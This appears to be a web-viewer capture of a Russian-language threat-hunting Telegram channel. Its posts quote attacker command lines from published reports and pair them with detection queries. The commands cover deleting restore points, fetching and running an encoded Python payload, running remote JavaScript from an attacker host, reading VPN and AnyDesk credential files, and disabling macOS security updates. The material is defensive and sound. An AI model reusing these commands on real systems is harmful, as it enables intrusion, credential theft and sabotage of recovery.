TGViewer
Channel Public Channel
Know Your Adversary

Know Your Adversary

@knowyouradversary

https://www.knowyouradversary.ru/
Subscribers
1.58K
Photos
382
Videos
2
Links
443
Recent Posts 20 shown
Post #476 243
Всем привет!

Уже на следующей неделе состоится KazHackStan 2026. В этом году я снова буду там выступать, и расскажу про ландшафт киберугроз Казахстана. Если вы будете на конференции - обязательно приходите послушать доклад, будет интересно! Ссылкой на трансляцию я, разумеется, позже поделюсь. А пока предлагаю вам посмотреть запись моего прошлогоднего доклада, посвященного активности кластера Bloody Wolf.

Увидимся на KazHackStan!
YouTube Live: KazHackStan 2025 | 2nd day | Zero Day KazHackStan is an annual practical conference dedicated to information security issues, held since 2017 and one of the largest conferences in Central Asia. The most exciting day of the conference is dedicated to the latest research and presentations from…
  • ❤ 4
  • 🔥 3
Post #475 414
Всем привет!

Обычно программы-вымогатели не демонстрируют применение интересных техник, но бывают и исключения. Сегодня мы посмотрим на любопытный случай реализации техники Inhibit System Recovery (T1490).

Сегодня мы взглянем на Monkey Ransomware и то, как он нейтрализует возможности восстановления скомпрометированной системы. В данном случае ВПО, помимо стандартных подходов вроде удаления теневых копий и локального каталога Windows Backup, еще и отключает System Restore и удаляет имеющиеся точки восстановления:

powershell.exe -Command "Disable-ComputerRestore -Drive C:\"
powershell.exe -Command "Get-ComputerRestorePoint | Remove-ComputerRestorePoint -RestorePointType All"


Несмотря на то, что зачастую эти действия реализуются практически одновременно с запуском процесса шифрования, в некоторых случаях атакующие могут использовать скрипты, чтобы нейтрализовать возможности восстановления системы до развертывания ВПО, следовательно, это может стать последним шансом для предотвращения ущерба:

event_type: "processcreatewin"

AND

proc_file_path: "powershell.exe"

AND

cmdline: ("Disable-ComputerRestore" OR "Remove-ComputerRestorePoint")


Скоро увидимся!

English version
Post #474 503
Всем привет!

Как вы знаете, злоумышленники нередко используют различные интерпретаторы команд и сценариев на различных этапах жизненного цикла атаки. Сегодня мы посмотрим на не самый распространенный пример использования Python (T1059.006).

Чтобы сформировать гипотезы для проактивного поиска, заглянем в отчет Zscaler о SloppyRAT. Нас будет интересовать, посвященная Python. Во-первых, атакующие использовали переименованную копию curl.exe для загрузки IronPython с GitHub:

"C:\Users\[redacted]\AppData\Local\9342371634011778.com" -s -L --tlsv1.2 --ssl-no-revoke -o "C:\Users\[redacted]\AppData\Local\IronPython.3.4.2.pdf" github.com/IronLanguages/ironpython3/releases/download/v3.4.2/IronPython.3.4.2.zip


В данном случае мы можем осуществлять поиск подозрительных загрузок IronPython с помощью cURL:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "curl.exe"

AND

cmdline: *ironpython*


Далее атакующие использовали загруженный интерпретатор для доставки CastleLoader, и далее - CastleRAT:

"C:\Users\[redacted]\AppData\Local\IronPython.3.4.2\net462\31706105999761.exe" -c "import base64,zlib,sys,subprocess as s;s.Popen([sys.executable,'-c',zlib.decompress(base64.b64decode('eJytEtLwAUhbMW/A8FF0Bq1aeEirhpeALi4o7qw1ixdbWPLQq/eege/iJVgN4uIjmfuaM2earkVRNBYPYleci4E4Eh1kL7FiTgTU2JvYov4TPtoDfFEzEUu+mJHHIiVscJee/rCvEuUokFPjq69YXLJzv7StZjd/Y70SYe5jxtLl6CncL09xtBzi2fW26c+ITfkPSVX0luQH/FeoDd3M4P2Jzdv7s6x/41ndfSUzHwhluFByjNB828azi+souev/OZ874d8LjPL/NotmDwj+w7y88+6yh72Lkm9AzpuxcM9Q8wlX0n0e')).decode('utf-32'))]"


В этот раз можно взглянуть на подозрительные запуски IronPython с декодированием base64:

event_type: "processcreatewin"

AND

proc_file_productname: "ironpython"

AND

cmdline: "base64.b64decode"


В целом, IronPython едва ли будет использоваться среднестатистическим пользователем, следовательно, появление подобного интерпретатора на хосте уже можно считать подозрительным событием.

Скоро увидимся!

English version
Post #473 654
Всем привет!

Сегодня мы поговорим о технике Direct Volume Access (T1006), которая нередко используется злоумышленниками для обхода ограничений доступа к интересующим их файлам, в том числе тем, что содержат учетные данные.

Например, атакующие могут получить доступ к теневым копиям. В данном случае злоумышленники осуществили многочисленные попытки дампа Security Account Manager (SAM) и доступа к файлу NTDS.dit, после чего воспользовались утилитой vssadmin для создания теневых копий дисков C:\ и F:\:

vssadmin create shadow /for=C:
vssadmin create shadow /for=F:


Несмотря на то, что такая активность может быть вполне легитимной, выполнение подобных команд может также указывать на попытки злоумышленников получить доступ к файлам, содержащих чувствительную информацию. Следовательно, похожие следы можно поискать проактивно:

event_type: "processcreatewin"

AND

proc_file_path: "vssadmin.exe"

AND

cmdline: ("create" AND "shadow")


Скоро увидимся!

English version
  • 👍 3
Post #472 779
Всем привет!

Надеюсь, вы помните, что сбор информации о скомпрометированной системе - один из самых ценных этапов с точки зрения проактивного поиска. Сегодня мы взглянем на технику System Location Discovery (T1614).

Довольно часто ВПО использует различные легитимные веб-сервисы для получения информации об IP-адресе скомпрометированной системы. В данном случае, злоумышленники использовали сразу несколько, а именно:

https://ipv4[.]ipleak[.]net/json/
https://get[.]geojs[.]io/v1/ip/geo[.]json
https://ipapi[.]co/json/
https://api[.]ipapi[.]is/
https://ipinfo[.]io/json


Если какие-то из этих сервисов вам неизвестны, они могут составить основу вашей гипотезы, например:

event_type: "dnsreqwin"

AND

dns_rname: ("ipv4.ipleak.net" OR "get.geojs.io" OR "ipapi.co" OR "api.ipapi.is" OR "ipinfo.io")


Скоро увидимся!

English version
  • ❤ 1
Post #471 727
Всем привет!

Сегодня поговорим о JavaScript (T1059.007) и о том, как атакующие злоупотребляют легитимной средой его выполнения.

В рамках очередной ClickFix-кампании, злоумышленники использовали довольно интересные техники. Во-первых, они использовали winget.exe для загрузки и инсталляции среды выполнения Deno. Во-вторых, использовали Deno для запуска вредоносной нагрузки с удаленного сервера, подконтрольного атакующим:

deno.exe run -A hxxp://webstizkgao[.]com/v020def066f14754be9.js


Кажется, злонамеренное использование Deno может быть отличной целью для проактивного поиска:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "deno.exe"

AND

cmdline: "run"


Скоро увидимся!

English version
Post #470 724
Всем привет!

Как вы наверняка знаете, техника Modify Registry (T1112) позволяет атакующим решить самые разные задачи в рамках жизненного цикла атаки. Сегодня мы взглянем на еще один интересный пример.

Чтобы обойти имеющиеся средства защиты, вымогатели, на этот раз Akira (Neon Wolf), в очередной раз воспользовались безопасным режимом в Windows. Разумеется, злоумышленникам нужно было как-то управлять скомпрометированной системой. Для этого они использовали AnyDesk, а чтобы он был запущен и после перезагрузки в безопасный режим, они осуществили следующую модификацию реестра:

"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AnyDesk /ve /d Service

Так как данная активность имеет место непосредственно перед началом распространения программ-вымогателей, это может стать последним шансом недопустить ущерб. Например, стоит обращать внимание на события подозрительной модификации соответствующего раздела реестра:

event_type: "registryvaluesetwin"

AND

reg_key_path: "safeboot"


Скоро увидимся!

English version
  • 🔥 4
Post #469 798
Всем привет!

Надеюсь, вы помните, что OFFZONE уже на следующей неделе. Сегодня я хочу немного рассказать вам про зону, за которую я отвечаю - Threat.Zone.

Она посвящена исследованию и расследованию реальных кибератак, но в этом году вы услышите и пару интересных докладов, посвященных наступательной безопасности.

В этом году спикеры расскажут про неочевидные источники криминалистических артефактов (и даже их злонамеренном использовании), интересных техниках злоумышленников, их многочисленных ошибках, а также о том, как выявить следы компрометации собственной ИТ-инфраструктуры, превратить киберразведданные в измеримую защиту, эффективно использовать ИИ в киберразведке, и о многом другом!.

Увидимся 21 августа в GOELRO!
  • ❤ 10
Post #468 725
Всем привет!

Сегодня посмотрим на пример того, как стремление атакующих избавиться от артефактов только добавляет шума. Более того, очень популярный пример.

А его источником послужит отчет Zscaler о новом модульном трояне удаленного доступа Abyssos. Несмотря на то, что троян новый, он использует огромное количество хорошо известных техник. Например, в рамках реализации техники File Deletion (T1070.004) ВПО выполняет следующую команду:

cmd.exe /C ping 127.0.0.1 -n 3 >nul & del /F /Q путь_к_файлу

Несмотря на то, что в данном случае удаляется вредоносный файл, структура команды весьма специфическая, что предоставляет нам возможность для обнаружения:

event_type: "processcreatewin"

AND

proc_file_path: "cmd.exe"

AND

cmdline: ("ping" AND "del")


Более того, это далеко не первый образец, для которого свойственен подобный поведенческий маркер, что позволяет обнаруживать не только данное семейство, но и множество других.

Скоро увидимся!

English version
  • ❤ 4
  • 👍 2
Post #467 741
Всем привет!

Туннели. Злоумышленники придумывают все новые и новые варианты их реализации. Сегодня мы снова взглянем на технику Protocol Tunneling (T1572).

Существует масса бесплатных сервисов туннелирования, которые позволяют сделать локальный сервис доступным из интернета через публичный URL. Например, злоумышленники часто используют Cloudflare Tunnel. А вот согласно этому отчету, атакующие использовали и localhost[.]run.

Обнаружить следы его использования можно, например, отслеживая коммуникации с поддоменами lhr[.]life:

event_type: dnsreq*

AND

dns_rname: "lhr.life"


Скоро увидимся!

English version
  • 🔥 2
Post #465
Channel photo updated
Post #464 751
Всем привет!

Сегодня взглянем на то, как злоумышленники борются с обновлениями скомпрометированных систем в рамках техники Disable or Modify Tools (T1685).

Более того, сегодня у нас в фокусе атаки на macOS. Давайте откроем отчет об активности XCSSET и пролистаем его до секции "Impairing Defenses". Как видите, злоумышленник использует следующие команды для отключения определенных механизмов обновлений безопасности Apple:

defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist ConfigDataInstall -bool false

defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist AllowRapidSecurityResponses -bool false


Первая команда отключает получение обновлений для обновлений XProtect, Gatekeeper и других защитных компонентов, вторая отключает установку Rapid Security Responses (RSR).

В данном случае мы можем поискать события модификации файла com.apple.SoftwareUpdate.plist с помощью defaults:

event_type: "processcreatemac"

AND

proc_file_path: "defaults"

AND

cmdline: "com.apple.SoftwareUpdate.plist"


Скоро увидимся!

English version
  • 🔥 3
Post #463 685
Всем привет!

Нередко злоумышленникам удается извлечь аутентификационный материал из файлов, о технике Credentials In Files (T1552.001) мы и поговорим.

Так, согласно отчету Kaspersky об активности кластера GOFFEE (Paper Werewolf), злоумышленники проявляли активный интерес к различным конфигурационным файлам, содержащим чувствительные данные, а именно:

cmd.exe /c type "%APPDATA%\AnyDesk\service.conf"
cmd.exe /c type "%USERPROFILE%\OpenVPN\config\avia\avia.ovpn"
cmd.exe /c type "%APPDATA%\Kerio\VpnClient\user.cfg"
cmd.exe /c dir "%USERPROFILE%\Downloads\Telegram Desktop"


Подобная активность, разумеется, предоставляет нам возможности для проактивного поиска, например:

event_type: "processcreatewin"

AND

proc_file_path: "cmd.exe"

AND

cmdline: ("type" OR "dir")

AND

cmdline: ("anydesk" OR "openvpn" OR "vpnclient" OR "telegram desktop")


Скоро увидимся!

English version
  • 🔥 3
  • 👍 2
Post #462 701

Forwarded from BI.ZONE

🌚 Core Werewolf меняет клыки: троян CoreRAT в атаках на российские организации

С июня по июль 2026 года специалисты BI.ZONE Threat Intelligence зафиксировали активность кластера Core Werewolf. Эксперты выявили, что злоумышленники начали использовать ранее неизвестный троян удаленного доступа CoreRAT.

В арсенале Core Werewolf уже встречались самописные мини-бэкдоры, однако CoreRAT — первый известный нам полноценный RAT их собственной разработки.

➡️Подробнее о кампаниях и техниках Core Werewolf

💬 Мы в MAX
  • ❤ 4
  • 🔥 2
Post #461 762
Всем привет!

Сегодня поговорим о тактиках Execution (TA0002) и Stealth (TA0005), и вариантах реализации техник PowerShell (T1059.001), JavaScript (T1059.007) и Mshta (T1218.005).

Источником примеров для нас станет вот этот отчет об активности Kimsuky (Monolithic Werewolf). Начнем с вредоносных ярлыков, которые распространяли злоумышленники. Так как вредоносный код находился непосредственно в самом LNK-файле, mshta.exe запускался с ним в качестве аргумента, что предоставляет нам возможность для обнаружения:

event_type: "processcreatewin"

AND

proc_file_path: "mshta.exe"

AND

cmdline: *.lnk


Вредоносный код представлял собой дроппер, который создавал следующие файлы в скомпрометированной системе:

“%APPDATA%\Microsoft\Windows\Templates\Templates.Js”

“%APPDATA%\Microsoft\Windows\Templates\Templates.Ps1”


При этом, первый служит для запуска второго. В данном случае мы можем использовать путь к этим файлам для проактичного поиска:

event_type: "processcreatewin"

AND

proc_file_path: ("powershell.exe" OR "wscript.exe" OR "cscript.exe")

AND

cmdline: "Microsoft\\Windows\\Templates"


Скоро увидимся!

English version
  • ❤ 3
Post #460 605

Forwarded from BI.ZONE

🐕 Insolent Hyena атакует российские организации с помощью трояна NightWire и стилера Excalibur

С января по июль 2026 года специалисты BI.ZONE Threat Intelligence исследовали активность кластера Insolent Hyena. Выяснилось, что злоумышленники активно взаимодействуют с кибершпионами и финансово мотивированными атакующими.

Для атак использовались:

🔵ранее неизвестный троян удаленного доступа NightWire;
🔵стилер Excalibur, написанный на Python и обфусцированный с помощью PyArmor;
🔵средства удаленного администрирования NetSupport;
🔵троян удаленного доступа CapDoor;
🔵C2-фреймворки AdaptixC2 и Cobalt Strike.

➡️Подробнее о кампании и техниках Insolent Hyena
  • 👍 3
Post #459 649
Всем привет!

Давно мы не говорили об интересных техниках, связанных с модификацией реестра. Самое время исправиться!

Сегодня поговорим о Cruciferra - криптере, который детально разобрали в своем отчете Proofpoint.

ВПО модифицирует следующие параметры реестра:

- ToastEnabled в Software\Microsoft\Windows\CurrentVersion\PushNotifications

- Balloon в Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

- ShowInfoTip в Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

Все эти параметры отвечают за различные оповещения пользователя, соотвсетвенно, их модификация позволяет атакующим спрятать от жертвы в том числе оповещения средств защиты.

Таким образом, мы имеем еще несколько возможностей для обнаружения потенциально вредоносной активности:

event_type: "registryvaluesetwin"

AND

reg_key_path: ("toastenabled" OR "balloon" OR "showinfotip")


Скоро увидимся!

English version
  • 👍 5
Post #458 788
Всем привет!

Продолжаем разбираться с угрозоцентричным подходом и практическим применением Threat Intelligence. В этот раз поговорим об одном из самых понятных сценариев применения - обнаружении угроз. Тем не менее, ограничиваться индикаторами компрометации мы, разумеется, не будем:

https://bi.zone/expertise/blog/kak-ispolzovat-kiberrazveddannye-dlya-obnaruzheniya-ugroz/
BI.ZONE Как использовать киберразведданные для обнаружения угроз В шестой части руководства объясняем, почему одни индикаторы компрометации легко обходятся злоумышленниками, а другие дают устойчивую защиту
  • ❤ 5
Post #456 775
Всем привет!

Сегодня практически любая атака с использование программ-вымогателей предполагает эксфильтрацию данных. Часто атакующие используют одни и те же инструменты, но бывают и исключения.

Например, согласно отчету Arctic Wolf Labs, атакующие, распространяющие вымогатель Qilin, использовали для эксфильтрации данных Proton Drive. Это облачное хранилище от швейцарской компании Proton, ориентированное на конфиденциальность. Его главная особенность — сквозное шифрование, при котором ваши файлы шифруются на устройстве до отправки в облако.

Безусловно, данный инструмент может использоваться в ИТ-инфраструктуре легитимно, тем не менее, он также может быть предвестником развертывания вымогательского ПО, поэтому вполне подходит для проактивного поиска:

event_type: "processcreatewin"

AND

proc_file_productname: "Proton Drive"


Скоро увидимся!

English version
  • ❤ 5
Older posts →

About this channel

How can I read @knowyouradversary without a Telegram account?
TGViewer shows the public web preview Telegram publishes for Know Your Adversary: recent posts, photos, videos and the subscriber count, with no app, login or account.
How many subscribers does Know Your Adversary have?
Know Your Adversary (@knowyouradversary) has 1.58K subscribers on Telegram, refreshed roughly every 30 minutes.
Does Know Your Adversary know I viewed it here?
No. Public channel previews carry no viewer identity, and TGViewer has no accounts or tracking of what you look up.
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →